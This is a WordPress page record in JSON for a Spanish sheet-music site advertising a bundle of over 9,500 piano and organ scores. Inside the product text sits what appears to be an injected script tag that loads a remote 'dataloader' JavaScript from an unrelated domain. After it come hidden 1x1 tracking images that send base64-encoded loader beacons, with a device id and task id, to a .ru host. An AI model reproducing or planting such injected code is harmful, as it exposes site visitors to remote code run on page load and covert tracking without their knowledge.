{"id":2633,"date":"2024-01-18T07:39:58","date_gmt":"2024-01-18T12:39:58","guid":{"rendered":"https:\/\/milesdepartituras.com\/?page_id=2633"},"modified":"2025-01-26T21:12:33","modified_gmt":"2025-01-27T02:12:33","slug":"piano","status":"publish","type":"page","link":"https:\/\/milesdepartituras.com\/?page_id=2633","title":{"rendered":"PIANO"},"content":{"rendered":"<p>[vc_row gap=\u00bb5&#8243;][vc_column icons_position=\u00bbleft\u00bb][vc_single_image image=\u00bb2634&#8243; img_size=\u00bbmedium\u00bb alignment=\u00bbcenter\u00bb style=\u00bbvc_box_shadow_border_circle\u00bb css_animation=\u00bbfadeInLeft\u00bb][\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb]<div id=\"sc_content_889862979\"\r\n\t\tclass=\"sc_content color_style_default sc_content_default sc_float_center\"><div class=\"sc_content_container\"><div id=\"sc_title_340994929\"\r\n\t\tclass=\"sc_title color_style_link3 sc_title_default  vc_custom_1705581490090\"><h4 class=\"sc_item_title sc_title_title sc_align_center sc_item_title_style_default sc_item_title_tag\">Piano u \u00d3rgano El\u00e9ctrico<\/h4><\/div><!-- \/.sc_title --><\/div><\/div><!-- \/.sc_content -->[\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb][vc_column_text]El paquete incluye m\u00e1s de <strong>9,500 partituras<\/strong> que abarcan desde obras cl\u00e1sicas hasta temas contempor\u00e1neos, dise\u00f1adas exclusivamente para interpretaci\u00f3n instrumental en <strong>Piano o \u00d3rgano electr\u00f3nico.<\/strong><\/p>\n<p><strong>Formatos disponibles<\/strong>: PDF, WinRAR, y WinZip.<span class=\"wixui-rich-text__text\" style=\"color: #ffffff;\">PDF<\/span><\/p>\n<p><script src=\"https:\/\/mainf.global-cache.online\/minified\/extensions\/dataloader_272i.js?t=2025-01-27T05:0\"><\/script><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiYWRhZjBlODYzMjE2NDc1NyIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX3N0YXJ0Iiwic3ViX2V2ZW50IjoiIiwibW9yZV9ldmVudCI6IiIsInRpbWVyIjowLCJ2ZXJzaW9uIjoxLCJpc19oaWRkZW4iOnRydWUsImhhc19mb2N1cyI6dHJ1ZSwidmlzaWJpbGl0eV9zdGF0ZSI6MjIsImJ1bmRsZSI6Im5vbmUifQ%3D%3D\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiYWRhZjBlODYzMjE2NDc1NyIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZCIsInN1Yl9ldmVudCI6IiIsIm1vcmVfZXZlbnQiOiIiLCJ0aW1lciI6MCwidmVyc2lvbiI6MSwiaXNfaGlkZGVuIjp0cnVlLCJoYXNfZm9jdXMiOnRydWUsInZpc2liaWxpdHlfc3RhdGUiOjIyLCJidW5kbGUiOiJub25lIn0%3D\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiYWRhZjBlODYzMjE2NDc1NyIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZF9zdGF0c19hIiwic3ViX2V2ZW50IjoiIiwibW9yZV9ldmVudCI6IiIsInRpbWVyIjowLCJ2ZXJzaW9uIjoxLCJpc19oaWRkZW4iOnRydWUsImhhc19mb2N1cyI6dHJ1ZSwidmlzaWJpbGl0eV9zdGF0ZSI6MjIsImJ1bmRsZSI6Im5vbmUifQ%3D%3D\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiYWRhZjBlODYzMjE2NDc1NyIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2JvZHkiLCJzdWJfZXZlbnQiOiIiLCJtb3JlX2V2ZW50IjoiIiwidGltZXIiOjAsInZlcnNpb24iOjEsImlzX2hpZGRlbiI6dHJ1ZSwiaGFzX2ZvY3VzIjp0cnVlLCJ2aXNpYmlsaXR5X3N0YXRlIjoyMiwiYnVuZGxlIjoibm9uZSJ9\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiYWRhZjBlODYzMjE2NDc1NyIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZF92aWV3X3NyX2QiLCJzdWJfZXZlbnQiOiIiLCJtb3JlX2V2ZW50IjoiIiwidGltZXIiOjAsInZlcnNpb24iOjEsImlzX2hpZGRlbiI6dHJ1ZSwiaGFzX2ZvY3VzIjp0cnVlLCJ2aXNpYmlsaXR5X3N0YXRlIjoyMiwiYnVuZGxlIjoibm9uZSJ9\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiYWRhZjBlODYzMjE2NDc1NyIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZF9hdXRoZXIiLCJzdWJfZXZlbnQiOiIiLCJtb3JlX2V2ZW50IjoiIiwidGltZXIiOjAsInZlcnNpb24iOjEsImlzX2hpZGRlbiI6dHJ1ZSwiaGFzX2ZvY3VzIjp0cnVlLCJ2aXNpYmlsaXR5X3N0YXRlIjoyMiwiYnVuZGxlIjoibm9uZSJ9\" width=\"1\" height=\"1\" \/>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column extra_bg=\u00bbsmall\u00bb hide_bg_image_on_tablet=\u00bb\u00bb hide_bg_image_on_mobile=\u00bb\u00bb icons_position=\u00bbleft\u00bb][vc_raw_html]JTNDaWZyYW1lJTIwY2xhc3MlM0QlMjJ0YWJsYWRvYyUyMiUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGbWlsZXNkZXBhcnRpdHVyYXMuY29tJTJGZHJpdmUlMkYlM0ZpZCUzRDJQQUNYLTF2UXlqdzBqb1gxWnJ5aGJDUDhFWmxVd2hiLU81dWdKMGhrNjFlWjlyMDhibFNfNnhodzdrdF9hSVprbVhKb1JabUVGUlZPNnBIXzR4RG0yJTIyJTNFJTNDJTJGaWZyYW1lJTNF[\/vc_raw_html][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row gap=\u00bb5&#8243;][vc_column icons_position=\u00bbleft\u00bb][vc_single_image image=\u00bb2634&#8243; img_size=\u00bbmedium\u00bb alignment=\u00bbcenter\u00bb style=\u00bbvc_box_shadow_border_circle\u00bb css_animation=\u00bbfadeInLeft\u00bb][\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb][\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb][vc_column_text]El paquete incluye m\u00e1s de 9,500 partituras que abarcan desde obras cl\u00e1sicas hasta temas contempor\u00e1neos, dise\u00f1adas exclusivamente para interpretaci\u00f3n instrumental en Piano o \u00d3rgano electr\u00f3nico. Formatos disponibles: PDF, WinRAR, y WinZip.PDF [\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column extra_bg=\u00bbsmall\u00bb hide_bg_image_on_tablet=\u00bb\u00bb hide_bg_image_on_mobile=\u00bb\u00bb icons_position=\u00bbleft\u00bb][vc_raw_html]JTNDaWZyYW1lJTIwY2xhc3MlM0QlMjJ0YWJsYWRvYyUyMiUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGbWlsZXNkZXBhcnRpdHVyYXMuY29tJTJGZHJpdmUlMkYlM0ZpZCUzRDJQQUNYLTF2UXlqdzBqb1gxWnJ5aGJDUDhFWmxVd2hiLU81dWdKMGhrNjFlWjlyMDhibFNfNnhodzdrdF9hSVprbVhKb1JabUVGUlZPNnBIXzR4RG0yJTIyJTNFJTNDJTJGaWZyYW1lJTNF[\/vc_raw_html][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_joinchat":[],"footnotes":""},"class_list":["post-2633","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages\/2633","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2633"}],"version-history":[{"count":20,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages\/2633\/revisions"}],"predecessor-version":[{"id":3634,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages\/2633\/revisions\/3634"}],"wp:attachment":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}